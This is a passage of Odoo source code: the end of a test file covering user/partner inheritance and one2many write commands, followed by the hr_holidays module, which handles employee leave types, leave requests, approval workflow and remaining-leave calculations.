super(TestInherits, self).setUp()
self.partner = self.registry('res.partner')
self.user = self.registry('res.users')
def test_default(self):
""" `default_get` cannot return a dictionary or a new id """
defaults = self.user.default_get(self.cr, UID, ['partner_id'])
if 'partner_id' in defaults:
self.assertIsInstance(defaults['partner_id'], (bool, int, long))
def test_create(self):
""" creating a user should automatically create a new partner """
partners_before = self.partner.search(self.cr, UID, [])
foo_id = self.user.create(self.cr, UID, {'name': 'Foo', 'login': 'foo', 'password': 'foo'})
foo = self.user.browse(self.cr, UID, foo_id)
self.assertNotIn(foo.partner_id.id, partners_before)
def test_create_with_ancestor(self):
""" creating a user with a specific 'partner_id' should not create a new partner """
par_id = self.partner.create(self.cr, UID, {'name': 'Foo'})
partners_before = self.partner.search(self.cr, UID, [])
foo_id = self.user.create(self.cr, UID, {'partner_id': par_id, 'login': 'foo', 'password': 'foo'})
partners_after = self.partner.search(self.cr, UID, [])
self.assertEqual(set(partners_before), set(partners_after))
foo = self.user.browse(self.cr, UID, foo_id)
self.assertEqual(foo.name, 'Foo')
self.assertEqual(foo.partner_id.id, par_id)
@mute_logger('openerp.models')
def test_read(self):
""" inherited fields should be read without any indirection """
foo_id = self.user.create(self.cr, UID, {'name': 'Foo', 'login': 'foo', 'password': 'foo'})
foo_values, = self.user.read(self.cr, UID, [foo_id])
partner_id = foo_values['partner_id'][0]
partner_values, = self.partner.read(self.cr, UID, [partner_id])
self.assertEqual(foo_values['name'], partner_values['name'])
foo = self.user.browse(self.cr, UID, foo_id)
self.assertEqual(foo.name, foo.partner_id.name)
@mute_logger('openerp.models')
def test_copy(self):
""" copying a user should automatically copy its partner, too """
foo_id = self.user.create(self.cr, UID, {
'name': 'Foo',
'login': 'foo',
'password': 'foo',
'supplier': True,
})
foo_before, = self.user.read(self.cr, UID, [foo_id])
del foo_before['__last_update']
bar_id = self.user.copy(self.cr, UID, foo_id, {
'login': 'bar',
'password': 'bar',
})
foo_after, = self.user.read(self.cr, UID, [foo_id])
del foo_after['__last_update']
self.assertEqual(foo_before, foo_after)
foo, bar = self.user.browse(self.cr, UID, [foo_id, bar_id])
self.assertEqual(bar.name, 'Foo (copy)')
self.assertEqual(bar.login, 'bar')
self.assertEqual(foo.supplier, bar.supplier)
self.assertNotEqual(foo.id, bar.id)
self.assertNotEqual(foo.partner_id.id, bar.partner_id.id)
@mute_logger('openerp.models')
def test_copy_with_ancestor(self):
""" copying a user with 'parent_id' in defaults should not duplicate the partner """
foo_id = self.user.create(self.cr, UID, {'name': 'Foo', 'login': 'foo', 'password': 'foo',
'login_date': '2016-01-01', 'signature': 'XXX'})
par_id = self.partner.create(self.cr, UID, {'name': 'Bar'})
foo_before, = self.user.read(self.cr, UID, [foo_id])
del foo_before['__last_update']
partners_before = self.partner.search(self.cr, UID, [])
bar_id = self.user.copy(self.cr, UID, foo_id, {'partner_id': par_id, 'login': 'bar'})
foo_after, = self.user.read(self.cr, UID, [foo_id])
del foo_after['__last_update']
partners_after = self.partner.search(self.cr, UID, [])
self.assertEqual(foo_before, foo_after)
self.assertEqual(set(partners_before), set(partners_after))
foo, bar = self.user.browse(self.cr, UID, [foo_id, bar_id])
self.assertNotEqual(foo.id, bar.id)
self.assertEqual(bar.partner_id.id, par_id)
self.assertEqual(bar.login, 'bar', "login is given from copy parameters")
self.assertFalse(bar.login_date, "login_date should not be copied from original record")
self.assertEqual(bar.name, 'Bar', "name is given from specific partner")
self.assertEqual(bar.signature, foo.signature, "signature should be copied")
CREATE = lambda values: (0, False, values)
UPDATE = lambda id, values: (1, id, values)
DELETE = lambda id: (2, id, False)
FORGET = lambda id: (3, id, False)
LINK_TO = lambda id: (4, id, False)
DELETE_ALL = lambda: (5, False, False)
REPLACE_WITH = lambda ids: (6, False, ids)
def sorted_by_id(list_of_dicts):
"sort dictionaries by their 'id' field; useful for comparisons"
return sorted(list_of_dicts, key=lambda d: d.get('id'))
class TestO2MSerialization(common.TransactionCase):
""" test the orm method 'write' on one2many fields """
def setUp(self):
super(TestO2MSerialization, self).setUp()
self.partner = self.registry('res.partner')
def test_no_command(self):
" empty list of commands yields an empty list of records "
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', [])
self.assertEqual(results, [])
def test_CREATE_commands(self):
" returns the VALUES dict as-is "
values = [{'foo': 'bar'}, {'foo': 'baz'}, {'foo': 'baq'}]
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', map(CREATE, values))
self.assertEqual(results, values)
def test_LINK_TO_command(self):
" reads the records from the database, records are returned with their ids. "
ids = [
self.partner.create(self.cr, UID, {'name': 'foo'}),
self.partner.create(self.cr, UID, {'name': 'bar'}),
self.partner.create(self.cr, UID, {'name': 'baz'})
]
commands = map(LINK_TO, ids)
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', commands, ['name'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'id': ids[0], 'name': 'foo'},
{'id': ids[1], 'name': 'bar'},
{'id': ids[2], 'name': 'baz'}
]))
def test_bare_ids_command(self):
" same as the equivalent LINK_TO commands "
ids = [
self.partner.create(self.cr, UID, {'name': 'foo'}),
self.partner.create(self.cr, UID, {'name': 'bar'}),
self.partner.create(self.cr, UID, {'name': 'baz'})
]
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', ids, ['name'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'id': ids[0], 'name': 'foo'},
{'id': ids[1], 'name': 'bar'},
{'id': ids[2], 'name': 'baz'}
]))
def test_UPDATE_command(self):
" take the in-db records and merge the provided information in "
id_foo = self.partner.create(self.cr, UID, {'name': 'foo'})
id_bar = self.partner.create(self.cr, UID, {'name': 'bar'})
id_baz = self.partner.create(self.cr, UID, {'name': 'baz', 'city': 'tag'})
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', [
LINK_TO(id_foo),
UPDATE(id_bar, {'name': 'qux', 'city': 'tagtag'}),
UPDATE(id_baz, {'name': 'quux'})
], ['name', 'city'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'id': id_foo, 'name': 'foo', 'city': False},
{'id': id_bar, 'name': 'qux', 'city': 'tagtag'},
{'id': id_baz, 'name': 'quux', 'city': 'tag'}
]))
def test_DELETE_command(self):
" deleted records are not returned at all. "
ids = [
self.partner.create(self.cr, UID, {'name': 'foo'}),
self.partner.create(self.cr, UID, {'name': 'bar'}),
self.partner.create(self.cr, UID, {'name': 'baz'})
]
commands = [DELETE(ids[0]), DELETE(ids[1]), DELETE(ids[2])]
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', commands, ['name'])
self.assertEqual(results, [])
def test_mixed_commands(self):
ids = [
self.partner.create(self.cr, UID, {'name': name})
for name in ['NObar', 'baz', 'qux', 'NOquux', 'NOcorge', 'garply']
]
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', [
CREATE({'name': 'foo'}),
UPDATE(ids[0], {'name': 'bar'}),
LINK_TO(ids[1]),
DELETE(ids[2]),
UPDATE(ids[3], {'name': 'quux',}),
UPDATE(ids[4], {'name': 'corge'}),
CREATE({'name': 'grault'}),
LINK_TO(ids[5])
], ['name'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'name': 'foo'},
{'id': ids[0], 'name': 'bar'},
{'id': ids[1], 'name': 'baz'},
{'id': ids[3], 'name': 'quux'},
{'id': ids[4], 'name': 'corge'},
{'name': 'grault'},
{'id': ids[5], 'name': 'garply'}
]))
def test_LINK_TO_pairs(self):
"LINK_TO commands can be written as pairs, instead of triplets"
ids = [
self.partner.create(self.cr, UID, {'name': 'foo'}),
self.partner.create(self.cr, UID, {'name': 'bar'}),
self.partner.create(self.cr, UID, {'name': 'baz'})
]
commands = map(lambda id: (4, id), ids)
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', commands, ['name'])
self.assertEqual(sorted_by_id(results), sorted_by_id([
{'id': ids[0], 'name': 'foo'},
{'id': ids[1], 'name': 'bar'},
{'id': ids[2], 'name': 'baz'}
]))
def test_singleton_commands(self):
"DELETE_ALL can appear as a singleton"
results = self.partner.resolve_2many_commands(
self.cr, UID, 'child_ids', [DELETE_ALL()], ['name'])
self.assertEqual(results, [])
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
avoinsystems/odoo | addons/hr_holidays/hr_holidays.py | 159 | 33482 | # -*- coding: utf-8 -*-
##################################################################################
#
# Copyright (c) 2005-2006 Axelor SARL. (http://www.axelor.com)
# and 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# $Id: hr.py 4656 2006-11-24 09:58:42Z Cyp $
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
import math
import time
from operator import attrgetter
from openerp.exceptions import Warning
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.translate import _
class hr_holidays_status(osv.osv):
_name = "hr.holidays.status"
_description = "Leave Type"
def get_days(self, cr, uid, ids, employee_id, context=None):
result = dict((id, dict(max_leaves=0, leaves_taken=0, remaining_leaves=0,
virtual_remaining_leaves=0)) for id in ids)
holiday_ids = self.pool['hr.holidays'].search(cr, uid, [('employee_id', '=', employee_id),
('state', 'in', ['confirm', 'validate1', 'validate']),
('holiday_status_id', 'in', ids)
], context=context)
for holiday in self.pool['hr.holidays'].browse(cr, uid, holiday_ids, context=context):
status_dict = result[holiday.holiday_status_id.id]
if holiday.type == 'add':
status_dict['virtual_remaining_leaves'] += holiday.number_of_days_temp
if holiday.state == 'validate':
status_dict['max_leaves'] += holiday.number_of_days_temp
status_dict['remaining_leaves'] += holiday.number_of_days_temp
elif holiday.type == 'remove': # number of days is negative
status_dict['virtual_remaining_leaves'] -= holiday.number_of_days_temp
if holiday.state == 'validate':
status_dict['leaves_taken'] += holiday.number_of_days_temp
status_dict['remaining_leaves'] -= holiday.number_of_days_temp
return result
def _user_left_days(self, cr, uid, ids, name, args, context=None):
employee_id = False
if context and 'employee_id' in context:
employee_id = context['employee_id']
else:
employee_ids = self.pool.get('hr.employee').search(cr, uid, [('user_id', '=', uid)], context=context)
if employee_ids:
employee_id = employee_ids[0]
if employee_id:
res = self.get_days(cr, uid, ids, employee_id, context=context)
else:
res = dict((res_id, {'leaves_taken': 0, 'remaining_leaves': 0, 'max_leaves': 0}) for res_id in ids)
return res
_columns = {
'name': fields.char('Leave Type', size=64, required=True, translate=True),
'categ_id': fields.many2one('calendar.event.type', 'Meeting Type',
help='Once a leave is validated, Odoo will create a corresponding meeting of this type in the calendar.'),
'color_name': fields.selection([('red', 'Red'),('blue','Blue'), ('lightgreen', 'Light Green'), ('lightblue','Light Blue'), ('lightyellow', 'Light Yellow'), ('magenta', 'Magenta'),('lightcyan', 'Light Cyan'),('black', 'Black'),('lightpink', 'Light Pink'),('brown', 'Brown'),('violet', 'Violet'),('lightcoral', 'Light Coral'),('lightsalmon', 'Light Salmon'),('lavender', 'Lavender'),('wheat', 'Wheat'),('ivory', 'Ivory')],'Color in Report', required=True, help='This color will be used in the leaves summary located in Reporting\Leaves by Department.'),
'limit': fields.boolean('Allow to Override Limit', help='If you select this check box, the system allows the employees to take more leaves than the available ones for this type and will not take them into account for the "Remaining Legal Leaves" defined on the employee form.'),
'active': fields.boolean('Active', help="If the active field is set to false, it will allow you to hide the leave type without removing it."),
'max_leaves': fields.function(_user_left_days, string='Maximum Allowed', help='This value is given by the sum of all holidays requests with a positive value.', multi='user_left_days'),
'leaves_taken': fields.function(_user_left_days, string='Leaves Already Taken', help='This value is given by the sum of all holidays requests with a negative value.', multi='user_left_days'),
'remaining_leaves': fields.function(_user_left_days, string='Remaining Leaves', help='Maximum Leaves Allowed - Leaves Already Taken', multi='user_left_days'),
'virtual_remaining_leaves': fields.function(_user_left_days, string='Virtual Remaining Leaves', help='Maximum Leaves Allowed - Leaves Already Taken - Leaves Waiting Approval', multi='user_left_days'),
'double_validation': fields.boolean('Apply Double Validation', help="When selected, the Allocation/Leave Requests for this type require a second validation to be approved."),
}
_defaults = {
'color_name': 'red',
'active': True,
}
def name_get(self, cr, uid, ids, context=None):
if context is None:
context = {}
if not context.get('employee_id',False):
# leave counts is based on employee_id, would be inaccurate if not based on correct employee
return super(hr_holidays_status, self).name_get(cr, uid, ids, context=context)
res = []
for record in self.browse(cr, uid, ids, context=context):
name = record.name
if not record.limit:
name = name + (' (%g/%g)' % (record.leaves_taken or 0.0, record.max_leaves or 0.0))
res.append((record.id, name))
return res
class hr_holidays(osv.osv):
_name = "hr.holidays"
_description = "Leave"
_order = "type desc, date_from asc"
_inherit = ['mail.thread', 'ir.needaction_mixin']
_track = {
'state': {
'hr_holidays.mt_holidays_approved': lambda self, cr, uid, obj, ctx=None: obj.state == 'validate',
'hr_holidays.mt_holidays_refused': lambda self, cr, uid, obj, ctx=None: obj.state == 'refuse',
'hr_holidays.mt_holidays_confirmed': lambda self, cr, uid, obj, ctx=None: obj.state == 'confirm',
},
}
def _employee_get(self, cr, uid, context=None):
emp_id = context.get('default_employee_id', False)
if emp_id:
return emp_id
ids = self.pool.get('hr.employee').search(cr, uid, [('user_id', '=', uid)], context=context)
if ids:
return ids[0]
return False
def _compute_number_of_days(self, cr, uid, ids, name, args, context=None):
result = {}
for hol in self.browse(cr, uid, ids, context=context):
if hol.type=='remove':
result[hol.id] = -hol.number_of_days_temp
else:
result[hol.id] = hol.number_of_days_temp
return result
def _get_can_reset(self, cr, uid, ids, name, arg, context=None):
"""User can reset a leave request if it is its own leave request or if
he is an Hr Manager. """
user = self.pool['res.users'].browse(cr, uid, uid, context=context)
group_hr_manager_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'group_hr_manager')[1]
if group_hr_manager_id in [g.id for g in user.groups_id]:
return dict.fromkeys(ids, True)
result = dict.fromkeys(ids, False)
for holiday in self.browse(cr, uid, ids, context=context):
if holiday.employee_id and holiday.employee_id.user_id and holiday.employee_id.user_id.id == uid:
result[holiday.id] = True
return result
def _check_date(self, cr, uid, ids, context=None):
for holiday in self.browse(cr, uid, ids, context=context):
domain = [
('date_from', '<=', holiday.date_to),
('date_to', '>=', holiday.date_from),
('employee_id', '=', holiday.employee_id.id),
('id', '!=', holiday.id),
('state', 'not in', ['cancel', 'refuse']),
]
nholidays = self.search_count(cr, uid, domain, context=context)
if nholidays:
return False
return True
_check_holidays = lambda self, cr, uid, ids, context=None: self.check_holidays(cr, uid, ids, context=context)
_columns = {
'name': fields.char('Description', size=64),
'state': fields.selection([('draft', 'To Submit'), ('cancel', 'Cancelled'),('confirm', 'To Approve'), ('refuse', 'Refused'), ('validate1', 'Second Approval'), ('validate', 'Approved')],
'Status', readonly=True, track_visibility='onchange', copy=False,
help='The status is set to \'To Submit\', when a holiday request is created.\
\nThe status is \'To Approve\', when holiday request is confirmed by user.\
\nThe status is \'Refused\', when holiday request is refused by manager.\
\nThe status is \'Approved\', when holiday request is approved by manager.'),
'user_id':fields.related('employee_id', 'user_id', type='many2one', relation='res.users', string='User', store=True),
'date_from': fields.datetime('Start Date', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, select=True, copy=False),
'date_to': fields.datetime('End Date', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, copy=False),
'holiday_status_id': fields.many2one("hr.holidays.status", "Leave Type", required=True,readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}),
'employee_id': fields.many2one('hr.employee', "Employee", select=True, invisible=False, readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}),
'manager_id': fields.many2one('hr.employee', 'First Approval', invisible=False, readonly=True, copy=False,
help='This area is automatically filled by the user who validate the leave'),
'notes': fields.text('Reasons',readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}),
'number_of_days_temp': fields.float('Allocation', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, copy=False),
'number_of_days': fields.function(_compute_number_of_days, string='Number of Days', store=True),
'meeting_id': fields.many2one('calendar.event', 'Meeting'),
'type': fields.selection([('remove','Leave Request'),('add','Allocation Request')], 'Request Type', required=True, readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, help="Choose 'Leave Request' if someone wants to take an off-day. \nChoose 'Allocation Request' if you want to increase the number of leaves available for someone", select=True),
'parent_id': fields.many2one('hr.holidays', 'Parent'),
'linked_request_ids': fields.one2many('hr.holidays', 'parent_id', 'Linked Requests',),
'department_id':fields.related('employee_id', 'department_id', string='Department', type='many2one', relation='hr.department', readonly=True, store=True),
'category_id': fields.many2one('hr.employee.category', "Employee Tag", help='Category of Employee', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}),
'holiday_type': fields.selection([('employee','By Employee'),('category','By Employee Tag')], 'Allocation Mode', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, help='By Employee: Allocation/Request for individual Employee, By Employee Tag: Allocation/Request for group of employees in category', required=True),
'manager_id2': fields.many2one('hr.employee', 'Second Approval', readonly=True, copy=False,
help='This area is automaticly filled by the user who validate the leave with second level (If Leave type need second validation)'),
'double_validation': fields.related('holiday_status_id', 'double_validation', type='boolean', relation='hr.holidays.status', string='Apply Double Validation'),
'can_reset': fields.function(
_get_can_reset,
type='boolean'),
}
_defaults = {
'employee_id': _employee_get,
'state': 'confirm',
'type': 'remove',
'user_id': lambda obj, cr, uid, context: uid,
'holiday_type': 'employee'
}
_constraints = [
(_check_date, 'You can not have 2 leaves that overlaps on same day!', ['date_from','date_to']),
(_check_holidays, 'The number of remaining leaves is not sufficient for this leave type', ['state','number_of_days_temp'])
]
_sql_constraints = [
('type_value', "CHECK( (holiday_type='employee' AND employee_id IS NOT NULL) or (holiday_type='category' AND category_id IS NOT NULL))",
"The employee or employee category of this request is missing. Please make sure that your user login is linked to an employee."),
('date_check2', "CHECK ( (type='add') OR (date_from <= date_to))", "The start date must be anterior to the end date."),
('date_check', "CHECK ( number_of_days_temp >= 0 )", "The number of days must be greater than 0."),
]
def _create_resource_leave(self, cr, uid, leaves, context=None):
'''This method will create entry in resource calendar leave object at the time of holidays validated '''
obj_res_leave = self.pool.get('resource.calendar.leaves')
for leave in leaves:
vals = {
'name': leave.name,
'date_from': leave.date_from,
'holiday_id': leave.id,
'date_to': leave.date_to,
'resource_id': leave.employee_id.resource_id.id,
'calendar_id': leave.employee_id.resource_id.calendar_id.id
}
obj_res_leave.create(cr, uid, vals, context=context)
return True
def _remove_resource_leave(self, cr, uid, ids, context=None):
'''This method will create entry in resource calendar leave object at the time of holidays cancel/removed'''
obj_res_leave = self.pool.get('resource.calendar.leaves')
leave_ids = obj_res_leave.search(cr, uid, [('holiday_id', 'in', ids)], context=context)
return obj_res_leave.unlink(cr, uid, leave_ids, context=context)
def onchange_type(self, cr, uid, ids, holiday_type, employee_id=False, context=None):
result = {}
if holiday_type == 'employee' and not employee_id:
ids_employee = self.pool.get('hr.employee').search(cr, uid, [('user_id','=', uid)])
if ids_employee:
result['value'] = {
'employee_id': ids_employee[0]
}
elif holiday_type != 'employee':
result['value'] = {
'employee_id': False
}
return result
def onchange_employee(self, cr, uid, ids, employee_id):
result = {'value': {'department_id': False}}
if employee_id:
employee = self.pool.get('hr.employee').browse(cr, uid, employee_id)
result['value'] = {'department_id': employee.department_id.id}
return result
# TODO: can be improved using resource calendar method
def _get_number_of_days(self, date_from, date_to):
"""Returns a float equals to the timedelta between two dates given as string."""
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
from_dt = datetime.datetime.strptime(date_from, DATETIME_FORMAT)
to_dt = datetime.datetime.strptime(date_to, DATETIME_FORMAT)
timedelta = to_dt - from_dt
diff_day = timedelta.days + float(timedelta.seconds) / 86400
return diff_day
def unlink(self, cr, uid, ids, context=None):
for rec in self.browse(cr, uid, ids, context=context):
if rec.state not in ['draft', 'cancel', 'confirm']:
raise osv.except_osv(_('Warning!'),_('You cannot delete a leave which is in %s state.')%(rec.state))
return super(hr_holidays, self).unlink(cr, uid, ids, context)
def onchange_date_from(self, cr, uid, ids, date_to, date_from):
"""
If there are no date set for date_to, automatically set one 8 hours later than
the date_from.
Also update the number_of_days.
"""
# date_to has to be greater than date_from
if (date_from and date_to) and (date_from > date_to):
raise osv.except_osv(_('Warning!'),_('The start date must be anterior to the end date.'))
result = {'value': {}}
# No date_to set so far: automatically compute one 8 hours later
if date_from and not date_to:
date_to_with_delta = datetime.datetime.strptime(date_from, tools.DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=8)
result['value']['date_to'] = str(date_to_with_delta)
# Compute and update the number of days
if (date_to and date_from) and (date_from <= date_to):
diff_day = self._get_number_of_days(date_from, date_to)
result['value']['number_of_days_temp'] = round(math.floor(diff_day))+1
else:
result['value']['number_of_days_temp'] = 0
return result
def onchange_date_to(self, cr, uid, ids, date_to, date_from):
"""
Update the number_of_days.
"""
# date_to has to be greater than date_from
if (date_from and date_to) and (date_from > date_to):
raise osv.except_osv(_('Warning!'),_('The start date must be anterior to the end date.'))
result = {'value': {}}
# Compute and update the number of days
if (date_to and date_from) and (date_from <= date_to):
diff_day = self._get_number_of_days(date_from, date_to)
result['value']['number_of_days_temp'] = round(math.floor(diff_day))+1
else:
result['value']['number_of_days_temp'] = 0
return result
def create(self, cr, uid, values, context=None):
""" Override to avoid automatic logging of creation """
if context is None:
context = {}
context = dict(context, mail_create_nolog=True)
if values.get('state') and values['state'] not in ['draft', 'confirm', 'cancel'] and not self.pool['res.users'].has_group(cr, uid, 'base.group_hr_user'):
raise osv.except_osv(_('Warning!'), _('You cannot set a leave request as \'%s\'. Contact a human resource manager.') % values.get('state'))
return super(hr_holidays, self).create(cr, uid, values, context=context)
def write(self, cr, uid, ids, vals, context=None):
if vals.get('state') and vals['state'] not in ['draft', 'confirm', 'cancel'] and not self.pool['res.users'].has_group(cr, uid, 'base.group_hr_user'):
raise osv.except_osv(_('Warning!'), _('You cannot set a leave request as \'%s\'. Contact a human resource manager.') % vals.get('state'))
return super(hr_holidays, self).write(cr, uid, ids, vals, context=context)
def holidays_reset(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {
'state': 'draft',
'manager_id': False,
'manager_id2': False,
})
to_unlink = []
for record in self.browse(cr, uid, ids, context=context):
for record2 in record.linked_request_ids:
self.holidays_reset(cr, uid, [record2.id], context=context)
to_unlink.append(record2.id)
if to_unlink:
self.unlink(cr, uid, to_unlink, context=context)
return True
def holidays_first_validate(self, cr, uid, ids, context=None):
obj_emp = self.pool.get('hr.employee')
ids2 = obj_emp.search(cr, uid, [('user_id', '=', uid)])
manager = ids2 and ids2[0] or False
self.holidays_first_validate_notificate(cr, uid, ids, context=context)
return self.write(cr, uid, ids, {'state':'validate1', 'manager_id': manager})
def holidays_validate(self, cr, uid, ids, context=None):
obj_emp = self.pool.get('hr.employee')
ids2 = obj_emp.search(cr, uid, [('user_id', '=', uid)])
manager = ids2 and ids2[0] or False
self.write(cr, uid, ids, {'state':'validate'})
data_holiday = self.browse(cr, uid, ids)
for record in data_holiday:
if record.double_validation:
self.write(cr, uid, [record.id], {'manager_id2': manager})
else:
self.write(cr, uid, [record.id], {'manager_id': manager})
if record.holiday_type == 'employee' and record.type == 'remove':
meeting_obj = self.pool.get('calendar.event')
meeting_vals = {
'name': record.name or _('Leave Request'),
'categ_ids': record.holiday_status_id.categ_id and [(6,0,[record.holiday_status_id.categ_id.id])] or [],
'duration': record.number_of_days_temp * 8,
'description': record.notes,
'user_id': record.user_id.id,
'start': record.date_from,
'stop': record.date_to,
'allday': False,
'state': 'open', # to block that meeting date in the calendar
'class': 'confidential'
}
#Add the partner_id (if exist) as an attendee
if record.user_id and record.user_id.partner_id:
meeting_vals['partner_ids'] = [(4,record.user_id.partner_id.id)]
ctx_no_email = dict(context or {}, no_email=True)
meeting_id = meeting_obj.create(cr, uid, meeting_vals, context=ctx_no_email)
self._create_resource_leave(cr, uid, [record], context=context)
self.write(cr, uid, ids, {'meeting_id': meeting_id})
elif record.holiday_type == 'category':
emp_ids = obj_emp.search(cr, uid, [('category_ids', 'child_of', [record.category_id.id])])
leave_ids = []
for emp in obj_emp.browse(cr, uid, emp_ids):
vals = {
'name': record.name,
'type': record.type,
'holiday_type': 'employee',
'holiday_status_id': record.holiday_status_id.id,
'date_from': record.date_from,
'date_to': record.date_to,
'notes': record.notes,
'number_of_days_temp': record.number_of_days_temp,
'parent_id': record.id,
'employee_id': emp.id
}
leave_ids.append(self.create(cr, uid, vals, context=None))
for leave_id in leave_ids:
# TODO is it necessary to interleave the calls?
for sig in ('confirm', 'validate', 'second_validate'):
self.signal_workflow(cr, uid, [leave_id], sig)
return True
def holidays_confirm(self, cr, uid, ids, context=None):
for record in self.browse(cr, uid, ids, context=context):
if record.employee_id and record.employee_id.parent_id and record.employee_id.parent_id.user_id:
self.message_subscribe_users(cr, uid, [record.id], user_ids=[record.employee_id.parent_id.user_id.id], context=context)
return self.write(cr, uid, ids, {'state': 'confirm'})
def holidays_refuse(self, cr, uid, ids, context=None):
obj_emp = self.pool.get('hr.employee')
ids2 = obj_emp.search(cr, uid, [('user_id', '=', uid)])
manager = ids2 and ids2[0] or False
for holiday in self.browse(cr, uid, ids, context=context):
if holiday.state == 'validate1':
self.write(cr, uid, [holiday.id], {'state': 'refuse', 'manager_id': manager})
else:
self.write(cr, uid, [holiday.id], {'state': 'refuse', 'manager_id2': manager})
self.holidays_cancel(cr, uid, ids, context=context)
return True
def holidays_cancel(self, cr, uid, ids, context=None):
for record in self.browse(cr, uid, ids):
# Delete the meeting
if record.meeting_id:
record.meeting_id.unlink()
# If a category that created several holidays, cancel all related
self.signal_workflow(cr, uid, map(attrgetter('id'), record.linked_request_ids or []), 'refuse')
self._remove_resource_leave(cr, uid, ids, context=context)
return True
def check_holidays(self, cr, uid, ids, context=None):
for record in self.browse(cr, uid, ids, context=context):
if record.holiday_type != 'employee' or record.type != 'remove' or not record.employee_id or record.holiday_status_id.limit:
continue
leave_days = self.pool.get('hr.holidays.status').get_days(cr, uid, [record.holiday_status_id.id], record.employee_id.id, context=context)[record.holiday_status_id.id]
if leave_days['remaining_leaves'] < 0 or leave_days['virtual_remaining_leaves'] < 0:
# Raising a warning gives a more user-friendly feedback than the default constraint error
raise Warning(_('The number of remaining leaves is not sufficient for this leave type.\n'
'Please verify also the leaves waiting for validation.'))
return True
# -----------------------------
# OpenChatter and notifications
# -----------------------------
def _needaction_domain_get(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
empids = emp_obj.search(cr, uid, [('parent_id.user_id', '=', uid)], context=context)
dom = ['&', ('state', '=', 'confirm'), ('employee_id', 'in', empids)]
# if this user is a hr.manager, he should do second validations
if self.pool.get('res.users').has_group(cr, uid, 'base.group_hr_manager'):
dom = ['|'] + dom + [('state', '=', 'validate1')]
return dom
def holidays_first_validate_notificate(self, cr, uid, ids, context=None):
for obj in self.browse(cr, uid, ids, context=context):
self.message_post(cr, uid, [obj.id],
_("Request approved, waiting second validation."), context=context)
class resource_calendar_leaves(osv.osv):
_inherit = "resource.calendar.leaves"
_description = "Leave Detail"
_columns = {
'holiday_id': fields.many2one("hr.holidays", "Leave Request"),
}
class hr_employee(osv.osv):
_inherit="hr.employee"
def create(self, cr, uid, vals, context=None):
# don't pass the value of remaining leave if it's 0 at the creation time, otherwise it will trigger the inverse
# function _set_remaining_days and the system may not be configured for. Note that we don't have this problem on
# the write because the clients only send the fields that have been modified.
if 'remaining_leaves' in vals and not vals['remaining_leaves']:
del(vals['remaining_leaves'])
return super(hr_employee, self).create(cr, uid, vals, context=context)
def _set_remaining_days(self, cr, uid, empl_id, name, value, arg, context=None):
employee = self.browse(cr, uid, empl_id, context=context)
diff = value - employee.remaining_leaves
type_obj = self.pool.get('hr.holidays.status')
holiday_obj = self.pool.get('hr.holidays')
# Find for holidays status
status_ids = type_obj.search(cr, uid, [('limit', '=', False)], context=context)
if len(status_ids) != 1 :
raise osv.except_osv(_('Warning!'),_("The feature behind the field 'Remaining Legal Leaves' can only be used when there is only one leave type with the option 'Allow to Override Limit' unchecked. (%s Found). Otherwise, the update is ambiguous as we cannot decide on which leave type the update has to be done. \nYou may prefer to use the classic menus 'Leave Requests' and 'Allocation Requests' located in 'Human Resources \ Leaves' to manage the leave days of the employees if the configuration does not allow to use this field.") % (len(status_ids)))
status_id = status_ids and status_ids[0] or False
if not status_id:
return False
if diff > 0:
leave_id = holiday_obj.create(cr, uid, {'name': _('Allocation for %s') % employee.name, 'employee_id': employee.id, 'holiday_status_id': status_id, 'type': 'add', 'holiday_type': 'employee', 'number_of_days_temp': diff}, context=context)
elif diff < 0:
raise osv.except_osv(_('Warning!'), _('You cannot reduce validated allocation requests'))
else:
return False
for sig in ('confirm', 'validate', 'second_validate'):
holiday_obj.signal_workflow(cr, uid, [leave_id], sig)
return True
def _get_remaining_days(self, cr, uid, ids, name, args, context=None):
cr.execute("""SELECT
sum(h.number_of_days) as days,
h.employee_id
from
hr_holidays h
join hr_holidays_status s on (s.id=h.holiday_status_id)
where
h.state='validate' and
s.limit=False and
h.employee_id in %s
group by h.employee_id""", (tuple(ids),))
res = cr.dictfetchall()
remaining = {}
for r in res:
remaining[r['employee_id']] = r['days']
for employee_id in ids:
if not remaining.get(employee_id):
remaining[employee_id] = 0.0
return remaining
